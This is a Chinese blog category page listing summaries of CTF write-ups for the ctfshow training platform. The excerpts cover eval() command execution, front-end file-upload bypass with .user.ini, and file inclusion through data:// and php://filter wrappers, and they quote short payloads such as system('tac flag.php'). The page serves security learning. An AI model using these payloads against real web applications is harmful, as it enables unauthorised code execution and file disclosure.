随笔分类 - ctfshow-wp
配合ctfshow靶场环境,理解一些基础性知识点
摘要:一、eval()函数调用--无严格过滤: 1、highlight_file()高亮显示: ?c=highlight_file(base64_decode("ZmxhZy5waHA=")); 2、shell命令: ?c=system("tac fl*g.php"); ?c=system("cat fl
阅读全文
摘要:一、仅做前端检测,未做后端校验:(ctfshow-web152) 不允许上传 .php等格式的文件 1、禁用 javascript 2、先上传符合格式要求的 .png图片 --> Burpsuite修改后缀为 .php 绕过前端检测 二、.user.ini文件利用:(ctfshow-web153)
阅读全文
摘要:文件包含与伪协议 一、无任何过滤措施的文件包含漏洞:(ctfshow-web78): 1、data://协议: ?file=data://text/plain,<?php system('tac flag.php');?> 2、php://filter协议: ?file=php://filter/r
阅读全文
摘要:个人Blog的第一篇博文 正式加入"博客园"大家庭了,希望以后可以一直坚持下去欸。
阅读全文

浙公网安备 33010602011771号